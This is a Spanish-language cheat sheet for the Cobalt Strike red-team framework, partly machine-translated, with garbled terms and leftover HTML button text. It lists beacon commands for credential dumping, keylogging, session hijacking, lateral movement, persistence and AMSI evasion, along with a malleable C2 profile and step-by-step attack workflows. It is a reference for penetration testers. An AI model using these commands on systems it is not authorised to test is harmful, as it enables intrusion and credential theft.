Cobalt Strike Cheat Sheet

"Clase de la hoja" id="copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada

Sinopsis

Cobalt Strike es una plataforma de pruebas de penetración comercial y operaciones de equipo rojo diseñada para emular a actores de amenazas avanzadas. Proporciona un marco posterior a la explotación que permite a los operadores desplegar balizas (agentes) en sistemas comprometidos, establecer canales de mando y control (C2) y realizar diversas operaciones de seguridad ofensivas.

NOVEDAD Advertencia: Cobalt Strike es una herramienta de pruebas de seguridad comercial que sólo debe utilizarse en entornos donde tiene permiso explícito para hacerlo.

Componentes básicos

Team Server

Servidor central de mando y control
Corre en Linux
Manages beacons and listeners
Proporciona colaboración para operaciones de equipo

Cliente

Aplicación GUI basada en Java
Se conecta a Team Server
Interfaz para que los operadores interactúen con las balizas
Visualiza las redes de destino

Beacon

Carga de sueldos primaria para después de la explotación
Establece la comunicación con Team Server
Proporciona diversas capacidades para operaciones ofensivas
Puede operar en diferentes modos de comunicación

Configuración y configuración

Configuración del servidor de equipo

# Start the Team Server
./teamserver <ip_address> <password> [malleable_c2_profile]

# Example
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile

Configuración del cliente

1. Launch the Cobalt Strike client
2. Connect > New Connection
3. Enter Team Server details:
   - Host: <team_server_ip>
   - Port: 50050 (default)
   - User: <username>
   - Password: <password>
4. Verify SSL certificate fingerprint

Oyentes

Creando oyentes

1. Cobalt Strike > Listeners
2. Click "Add"
3. Configure listener settings:
   - Name: <listener_name>
   - Payload: <beacon_type>
   - Host: <callback_domain_or_ip>
   - Port: <port_number>
   - Profile: <malleable_c2_profile>
4. Click "Save"

Tipos de oyente

Type	Description
HTTP	Uses HTTP for C2 communication
HTTPS	Uses HTTPS for C2 communication
DNS	Uses DNS queries for stealthy C2
SMB	Uses named pipes for peer-to-peer C2
TCP	Uses direct TCP connections
Foreign	Integrates with other C2 frameworks

Generación de carga útil

Tipos de carga de Beacon

Attacks > Packages > <payload_type>

Payload Type	Description
Windows Executable	Standard .exe file
Windows Service EXE	Service executable
DLL	Dynamic Link Library
PowerShell	PowerShell one-liner
Python	Python script
Office Macro	Macro for Office documents
Shellcode	Raw shellcode

Kit de artefactos

Attacks > Packages > Windows Executable (S)

Genera cargas a medida con técnicas de evasión
Modifica las firmas para evitar la detección
Plantillas personalizables

Comandos de Beacon

Gestión del período de sesiones

Command	Description
`help`	Display help information
`sleep [seconds] [jitter%]`	Set sleep time and jitter
`checkin`	Force immediate check-in
`exit`	Terminate the beacon session
`clear`	Clear the beacon's task queue
`jobs`	List running jobs
`jobkill [JID]`	Kill a running job
`mode dns`	Switch to DNS mode
`mode dns-txt`	Switch to DNS-TXT mode
`mode dns6`	Switch to DNS6 mode
`mode http`	Switch to HTTP mode
`mode smb`	Switch to SMB mode

Reunión de información

Command	Description
`hostname`	Get the hostname
`ipconfig`	Display network configuration
`netstat`	Display network connections
`ps`	List running processes
`tasklist`	Alternative to ps
`getuid`	Get current user ID
`whoami`	Get detailed user information
`pwd`	Print working directory
`drives`	List available drives
`dir [directory]`	List files in directory
`ls [directory]`	Alternative to dir
`net [command]`	Execute net command
`reg query [path]`	Query registry
`sysinfo`	Get system information

Operaciones de archivo

Command	Description
`cd [directory]`	Change directory
`cp [source] [destination]`	Copy a file
`mkdir [directory]`	Create a directory
`mv [source] [destination]`	Move or rename a file
`rm [file]`	Delete a file
`rmdir [directory]`	Delete a directory
`cat [file]`	Display file contents
`download [file]`	Download a file from target
`upload [file]`	Upload a file to target
`timestomp [file] [template]`	Modify file timestamps
`ls-acl [file]`	List file permissions

Operaciones de procesos

Command	Description
`execute [program]`	Execute without capturing output
`shell [command]`	Execute and capture output
`run [program]`	Execute a program
`runas [user] [password] [program]`	Execute as another user
`pth [user] [domain] [hash]`	Pass-the-hash to create a token
`steal_token [pid]`	Steal token from process
`make_token [domain] [user] [password]`	Create a token
`rev2self`	Revert to original token
`getprivs`	Enable system privileges
`getsystem`	Attempt to get SYSTEM privileges
`execute-assembly [file.exe]`	Execute .NET assembly in memory
`powerpick [command]`	Execute PowerShell without powershell.exe
`powershell [command]`	Execute PowerShell command
`psinject [pid] [command]`	Execute PowerShell in specific process
`shinject [pid] [arch] [file.bin]`	Inject shellcode into process
`dllinject [pid] [file.dll]`	Inject DLL into process
`dllload [file.dll]`	Load DLL in beacon process

Movimiento Lateral

Command	Description
`psexec [target] [listener]`	Use PsExec to deploy beacon
`psexec_psh [target] [listener]`	Use PsExec with PowerShell
`winrm [target] [listener]`	Use WinRM to deploy beacon
`wmi [target] [listener]`	Use WMI to deploy beacon
`ssh [target:port] [user] [pass] [listener]`	Use SSH to deploy beacon
`ssh-key [target:port] [user] [key] [listener]`	Use SSH with key authentication
`dcsync [domain] [user]`	Use DCSync to extract password hashes
`jump [method] [target] [listener]`	Jump to target using specified method
`remote-exec [method] [target] [command]`	Execute command on remote system

Pivoting

Command	Description
`rportfwd [bind port] [forward host] [forward port]`	Set up reverse port forward
`rportfwd stop [bind port]`	Stop reverse port forward
`socks [port]`	Start SOCKS proxy server
`socks stop`	Stop SOCKS proxy server
`spunnel [host] [port]`	Create encrypted tunnel over SMB
`spunnel stop`	Stop encrypted tunnel
`covertvpn [interface] [IP/Mask]`	Deploy Covert VPN interface
`covertvpn stop`	Stop Covert VPN
`pivot [host] [port]`	List pivot listeners
`pivotlistener [host] [port]`	Create pivot listener

Post-Explotación

Command	Description
`mimikatz [command]`	Execute Mimikatz command
`hashdump`	Dump password hashes
`logonpasswords`	Dump credentials from memory
`keylogger [pid]`	Start keylogger
`screenshot [pid]`	Take screenshot
`screenwatch [pid]`	Watch target's screen
`printscreen`	Take screenshot using PrintScreen
`reg query [path]`	Query registry
`powerview [command]`	Execute PowerView command
`portscan [targets] [ports] [discovery method]`	Scan for open ports
`browserpivot [pid] [port]`	Hijack authenticated web sessions
`chromedump`	Dump Chrome cookies and login data
`persist [method] [listener]`	Set up persistence
`elevate [exploit] [listener]`	Attempt privilege escalation

Malleable C2 Profiles

Estructura básica

# Global options
set sleeptime "5000";
set jitter "10";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";

# HTTP staging
http-stager \\\\{
    set uri "/jquery-3.3.1.min.js";
    client \\\\{
        header "Accept" "text/javascript, application/javascript, */*";
    \\\\}
    server \\\\{
        header "Content-Type" "application/javascript";
    \\\\}
\\\\}

# HTTP client
http-get \\\\{
    set uri "/api/v1/data";
    client \\\\{
        header "Accept" "application/json";
        metadata \\\\{
            base64;
            prepend "session=";
            append ";";
            header "Cookie";
        \\\\}
    \\\\}
    server \\\\{
        header "Content-Type" "application/json";
        output \\\\{
            json \\\\{
                "status" "success";
                "data" "";
            \\\\}
            prepend "\\\\{\"data\":\"";
            append "\"\\\\}";
            base64;
        \\\\}
    \\\\}
\\\\}

Perfiles de prueba

# Verify profile syntax
./c2lint c2-profiles/normal/amazon.profile

# Start Team Server with profile
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile

Scripts agresivos

Estructura básica del script

# Event handlers
on beacon_initial \\\\{
    println("New beacon: " . $1);
\\\\}

# Aliases (custom commands)
alias hello \\\\{
    blog($1, "Hello, World!");
\\\\}

# Menus
popup beacon_bottom \\\\{
    item "Custom Command" \\\\{
        blog($1, "Executing custom command...");
        bshell($1, "whoami");
    \\\\}
\\\\}

# Functions
sub get_system_info \\\\{
    bshell($1, "systeminfo");
\\\\}

Funciones comunes del script

Function	Description
`blog($1, "message")`	Write to beacon console
`bshell($1, "command")`	Execute shell command
`bpowershell($1, "command")`	Execute PowerShell command
`bpowerpick($1, "command")`	Execute PowerShell without powershell.exe
`bexecute_assembly($1, "/path/to/file.exe")`	Execute .NET assembly
`bdllspawn($1, "/path/to/file.dll")`	Inject Reflective DLL
`bpsexec($1, "target", "listener")`	Execute PsExec lateral movement
`bwmi($1, "target", "listener")`	Execute WMI lateral movement
`bwinrm($1, "target", "listener")`	Execute WinRM lateral movement

OPSEC Consideraciones

Inyección del proceso

# Set parent process for new processes
ppid [pid]

# Set process to spawn for post-ex jobs
spawnto x64 %windir%\\sysnative\\rundll32.exe
spawnto x86 %windir%\\syswow64\\rundll32.exe

# Mask command-line arguments
argue [command] [fake arguments]

# Block non-Microsoft DLLs
blockdlls start
blockdlls stop

Técnicas de evacuación

# Obfuscate beacon in memory
sleep_mask [seconds] [jitter%]

# Configure staging process
stage \\\\{
    set obfuscate "true";
    set stomppe "true";
    set cleanup "true";
\\\\}

# Disable AMSI
amsi_disable

# Use smarter process injection
smartinject

Corrientes de trabajo comunes

Acceso inicial

1. Create a listener (Cobalt Strike > Listeners)
2. Generate a payload (Attacks > Packages)
3. Deliver payload to target
4. Wait for beacon check-in

Escalada de Privilege

1. Check current privileges: getuid
2. Attempt to get SYSTEM: getsystem
3. If unsuccessful, try specific exploits: elevate [exploit] [listener]
4. Verify new privileges: getuid

Cosecha temporal

1. Dump hashes: hashdump
2. Dump credentials from memory: logonpasswords
3. Use Mimikatz for advanced options: mimikatz [command]
4. Extract domain hashes (if DC): dcsync [domain] [user]

Movimiento Lateral

1. Identify targets: net view
2. Choose lateral movement technique:
   - psexec [target] [listener]
   - winrm [target] [listener]
   - wmi [target] [listener]
3. Verify new beacon check-in

Persistencia

1. Choose persistence method:
   - persist [method] [listener]
   - schtasks [options]
   - service [options]
   - registry [options]
2. Verify persistence works
3. Document persistence mechanisms for cleanup

Recursos

Documentación oficial del ataque de cobalto
Cobalt Strike User Guide
Malleable C2 Profiles
Aggressor Script Documentation
[Cobalt Strike (LINK_5)